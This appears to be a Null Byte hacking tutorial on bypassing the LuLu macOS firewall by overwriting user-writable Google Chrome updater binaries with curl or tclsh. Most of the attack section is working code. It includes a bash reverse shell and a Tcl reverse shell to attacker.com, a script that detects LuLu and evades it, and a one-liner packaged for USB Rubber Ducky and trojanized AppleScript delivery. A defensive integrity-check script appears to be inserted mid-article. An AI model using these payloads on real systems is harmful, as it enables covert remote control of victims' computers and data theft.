
How to Avoid the LuLu Firewall with Google Chrome Dependencies «Null Byte :: WonderHowTo



Firewall solutions for macOS are not immune to attack. By abusing web browser dependencies that the firewall has already whitelisted, an attacker can exfiltrate data from, or remotely control, a MacBook, iMac, Mac mini, or any other computer running macOS (formerly known as Mac OS X).

In a recent article, Kody showed how to set up and install LuLu, an open-source firewall for macOS. Although I had never tried LuLu before, it always seemed like a reliable and free alternative to Little Snitch. After installing LuLu, I set out to find a way to bypass its detection.

Step 1: Installing LuLu for the First Time

During installation, LuLu offers to find Mac applications already installed in the operating system and add them to a whitelist.

If my system had been compromised before installing LuLu, this feature could miss a suspicious outgoing connection and inadvertently whitelist the activity, so I decided not to use it. Any non-Apple connection is then reported and requires user interaction.

It also took me a few minutes to remove some non-essential apps from the whitelist to minimize the attack surface. Looking at the remaining programs, they are all in protected directories that cannot be modified with user privileges (i.e., without root).

Top image: minimal software installed and the whitelist configured after installing LuLu. Bottom image: no additional third-party software (e.g., Chrome, Firefox, VLC).

When Google Chrome was opened for the first time after installing LuLu, the Chrome Helper process tried to reach the internet with a DNS request.

Denying this request should not affect the application's functionality. Chrome eventually tried to update itself using the ksfetch and GoogleSoftwareUpdateAgent processes. Ksfetch and the update agent are known mechanisms of Google Chrome. Both were allowed, since otherwise Chrome might not be able to update itself in the future.

Step 2: Bypassing LuLu with Applications Installed

The bypass is made possible by weak file and directory permissions on some third-party applications installed outside the App Store. Let's look at the file permissions of the Google Chrome browser, installed directly from Google via the DMG installer.

~ $ ls -l /Applications/

total 0
drwxr-xr-x   3 root       admin  96B Jun 12 03:23 1Password 7.app
drwxr-xr-x@  3 root       wheel  96B Aug 18  2018 Calculator.app
drwxr-xr-x@  3 root       wheel  96B Aug 18  2018 FaceTime.app
drwxr-xr-x@  3 tokyoneon  admin  96B Jun  4 08:50 Google Chrome.app
drwxr-xr-x@  3 root       wheel  96B Aug 18  2018 Home.app
drwxr-xr-x@  3 root       wheel  96B Aug 18  2018 Image Capture.app

Note that the Google Chrome app is owned by the user, not by root like the other applications. Looking again at the ksfetch and GoogleSoftwareUpdateAgent rules in LuLu, we see that both binaries live under the /Users/$USER/Library/ directory.

Like the files in the Chrome directory, these binaries can be modified by the user. To be clear, every file in /Users/$USER/Library/ and /Applications/Google Chrome.app/ is fair game for an attacker and can be changed with ease.

The following command overwrites ksfetch with curl, which is not whitelisted in the LuLu firewall.

~ $ cp /usr/bin/curl /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch

Without being whitelisted, curl can still reach the internet this way:

~ $ /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch "https://ifconfig.me/all"

ip_addr: 198.251.89.219
remote_host: unavailable
user_agent: curl/7.54.0
port: 28596
language:
referer:
connection:
keep_alive:
method: GET
encoding:
mime: */*
charset:
via: 1.1 google
forwarded: 198.251.89.219, 216.239.36.21

This example uses ksfetch, but GoogleSoftwareUpdateAgent and Google Chrome itself can also be overwritten and used to connect to a remote server or to exfiltrate data. Overwriting Chrome will of course affect the browser's functionality, but by that time an attacker would already have exfiltrated sensitive information. With this knowledge, we can set up reverse shell payloads and remotely control the Mac from anywhere.
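The defensive counterpart to the overwrite above is to stop trusting a whitelisted binary by path alone. The following Python script (example code added here, not from the article or from LuLu) records a SHA-256, owner and mode baseline for whitelisted binaries and re-verifies it later, flagging anything that changed and anything an unprivileged user could change; the watched path is the article's ksfetch location, and the files used in the test are constructed.

```python
import hashlib
import os
import stat

# Constructed example path: the article's ksfetch, expanded for the current user.
KSFETCH = os.path.expanduser(
    "~/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle"
    "/Contents/MacOS/ksfetch")

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def fingerprint(path):
    """Content hash plus the two attributes that make the bypass possible."""
    st = os.stat(path)
    return {"sha256": sha256_of(path), "uid": st.st_uid,
            "mode": stat.S_IMODE(st.st_mode)}

def build_baseline(paths):
    """Record a fingerprint for every whitelisted binary that exists."""
    return {p: fingerprint(p) for p in paths if os.path.isfile(p)}

def verify(baseline):
    """Return (path, finding) pairs: 'missing', 'content-changed',
    'owner-changed', 'mode-changed', and 'user-writable' when the file is
    not root-owned or is group/world writable (the bypass precondition)."""
    findings = []
    for path, old in baseline.items():
        if not os.path.isfile(path):
            findings.append((path, "missing"))
            continue
        cur = fingerprint(path)
        for key, label in (("sha256", "content-changed"),
                           ("uid", "owner-changed"), ("mode", "mode-changed")):
            if cur[key] != old[key]:
                findings.append((path, label))
        if cur["uid"] != 0 or cur["mode"] & 0o022:
            findings.append((path, "user-writable"))
    return findings

if __name__ == "__main__":
    base = build_baseline([KSFETCH])  # run once and store the result securely
    for path, finding in verify(base):  # re-run on a schedule or from a launchd job
        print(f"ALERT {finding}: {path}")
```

On macOS, pair this with `codesign --verify --deep --strict` on GoogleSoftwareUpdate.bundle, whose seal no longer matches once a file inside it has been replaced.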

Step 3: Overwrite ksfetch with Tclsh

The following example uses the tclsh command, which is used to create an interactive bash-like shell that lets the attacker execute commands remotely. For good measure, the tclsh binaries and symlinks were manually blocked in the firewall.

As a low-privileged user, the tclsh binary is copied over ksfetch, completely overwriting the file and its functionality.

~ $ cp /usr/bin/tclsh /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch

The tclsh shell is started by invoking the ksfetch binary directly. From this interactive terminal, commands are executed the same way as in a Netcat or Bash shell.

~ $ /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch

% ls -la /
total 36
drwxr-xr-x@   2 root  wheel    64 Jun 25 09:57 .PKInstallSandboxManager-SystemSoftware
drwx------    5 root  wheel   160 Jun  5 19:36 .Spotlight-V100
drwxrwxr-x+ 138 root  admin  4416 Jun 25 09:54 Applications
drwxr-xr-x+  70 root  wheel  2240 Jun  5 19:37 Library
drwxr-xr-x@   2 root  wheel    64 Oct  5  2018 Network
drwxr-xr-x@   5 root  wheel   160 Sep 21  2018 System
drwxr-xr-x    6 root  admin   192 May 10 17:34 Users
drwxr-xr-x@   5 root  wheel   160 Jun 25 18:51 Volumes
drwxr-xr-x@  37 root  wheel  1184 May 22 11:14 bin
drwxrwxr-t@   2 root  admin    64 Oct  5  2018 cores
dr-xr-xr-x    3 root  wheel  7834 Jun 25 09:50 dev
lrwxr-xr-x@   1 root  wheel    11 Oct  5  2018 etc -> private/etc
dr-xr-xr-x    2 root  wheel     1 Jun 25 16:57 home
dr-xr-xr-x    2 root  wheel     1 Jun 25 16:57 net
drwxr-xr-x    3 root  wheel    96 Oct  3  2018 opt
drwxr-xr-x    6 root  wheel   192 Jun  5 17:49 private
drwxr-xr-x@  64 root  wheel  2048 May 22 11:14 sbin
lrwxr-xr-x@   1 root  wheel    11 Oct  5  2018 tmp -> private/tmp
drwxr-xr-x@   9 root  wheel   288 Sep 21  2018 usr
lrwxr-xr-x@   1 root  wheel    11 Oct  5  2018 var -> private/var

% uname -a
Darwin User-MacBook.local 18.6.0 Darwin Kernel Version 18.6.0: Thu Apr 25 23:16:27 PDT 2019; root:xnu-4903.261.4~2/RELEASE_X86_64 x86_64
%

Step 4: Design Payload with Active Evasion

So how would an attacker know whether LuLu is installed on the operating system? Installed security software could be enumerated by listing installed packages or by watching for LuLu's automatic update checks. Instead, the payload should recognize signs of LuLu before executing its instructions.

The following example inspects background processes with the ps command. As we can see, several processes named "LuLu" are running.

~ $ ps auxwww | grep -i [l]ulu

root         94   0.3  0.7  4349052  28088   ??  Rs    1:33AM   0:18.59 /Library/Objective-See/LuLu/LuLu.bundle/Contents/MacOS/LuLu
tokyoneon   291   0.0  0.8  4924936  35092   ??  S     1:34AM   0:01.10 /Applications/LuLu.app/Contents/Library/LoginItems/LuLu Helper.app/Contents/MacOS/LuLu Helper

A simple bash if statement, embedded in an AppleScript, was able to reliably detect the LuLu process.

#!/bin/bash

# Look for a running LuLu process; the [l] trick keeps grep from matching itself.
if [[ ! "$(/bin/ps auxwww | /usr/bin/grep -i [l]ulu)" ]]; then
    echo "LuLu not found."
else
    echo "LuLu detected."
fi

A handier script that goes beyond detecting LuLu processes and automatically overwrites Google Chrome binaries could look like this:

#!/bin/bash

# The `ps` command displays active processes, and `grep` locates
# LuLu among them.
if [[ ! "$(/bin/ps auxwww | /usr/bin/grep -i [l]ulu)" ]]; then

    # An arbitrary "echo" command. If LuLu is not found, the
    # following commands are executed. An example bash
    # reverse shell is included.
    echo "LuLu not found, hack the planet!"
    /bin/bash -i >& /dev/tcp/attacker.com/443 0>&1
else
    # An arbitrary "echo" command with a sad face.
    echo "LuLu detected 🙁"

    # Copy the `tclsh` binary over `ksfetch`.
    /bin/cp /usr/bin/tclsh /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch

    # TCL reverse shell, which is covered in the following article.
    # https://null-byte.com/tcl-0186330/
    echo 'set s [socket attacker.com 443]; while 42 {puts -nonewline $s "hacker>"; flush $s; gets $s c; set e "exec $c"; if {![catch {set r [eval $e]} err]} {puts $s $r}; flush $s;}; close $s;' | /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch &

    # Another "echo" command.
    echo "LuLu bypassed, hack the planet!"
fi

The script can be condensed into a single line so that it works easily with trojanized AppleScripts, MouseJack attacks, USB dead drops, and USB Rubber Ducky payloads.

if [[ ! "$(/bin/ps auxwww | /usr/bin/grep -i [l]ulu)" ]]; then /bin/bash -i >& /dev/tcp/attacker.com/443 0>&1; else /bin/cp /usr/bin/tclsh /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch && echo 'set s [socket attacker.com 443]; while 42 {puts -nonewline $s "hacker>"; flush $s; gets $s c; set e "exec $c"; if {![catch {set r [eval $e]} err]} {puts $s $r}; flush $s;}; close $s;' | /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch & fi

If Chrome is not installed on the target system, it may take some work to identify a comparable dependency of another browser. Detecting the installed browsers might look like this:

#!/bin/bash

if [[ ! "$(/bin/ps auxwww | /usr/bin/grep -i [l]ulu)" ]]; then
    echo "LuLu not found."
else
    echo "LuLu detected."
    # Check for known browsers whose bundles live in user-writable locations.
    if [[ -d "/Applications/Google Chrome.app/" ]]; then
        echo "Chrome browser detected. Overwriting ksfetch ..."
    elif [[ -d "/Applications/Firefox.app/" ]]; then
        echo "Firefox detected. Overwriting ..."
    elif [[ -d "/Applications/Opera.app/" ]]; then
        echo "Opera detected. Overwriting ..."
    else
        echo "Oh no, there are no more browsers we can exploit ..."
    fi
fi

Identifying Inconsistencies with the Bypass

With LuLu running, ksfetch (tclsh) was able to access the internet most of the time, but not always. On one occasion, I found that restarting the MacBook caused the bypass to fail and triggered LuLu's detection, even though ksfetch and the other Chrome binaries were whitelisted.

I was not able to spend much time with LuLu, but I encourage anyone interested in this attack to find out when and why whitelisted processes are sometimes stopped.

No security software is perfect.

This article is not intended as an attack on LuLu's developer. It simply shows that security software is not perfect and that no system is fully protected while in use.

LuLu is a fantastic firewall solution designed to prevent passive and common attacks. Like most programs, it is not designed to withstand a targeted attack using active evasion. Does this mean we should stop using LuLu and other security solutions? Absolutely not. Although this bypass is easy to reproduce and is not considered a significant security hole, firewall software such as LuLu can still prevent attacks. For example, with an established tclsh connection, the attacker is limited to a few built-in tools, since most are not on the firewall's whitelist. Downloading additional software or exfiltrating data is much more difficult thanks to LuLu.

If you liked this article, follow me on Twitter @tokyoneon_ as I intend to release bypasses for other security software in the future. If you have questions or concerns, leave a comment or message on Twitter.


Cover photo and screenshots by tokyoneon/Null Byte
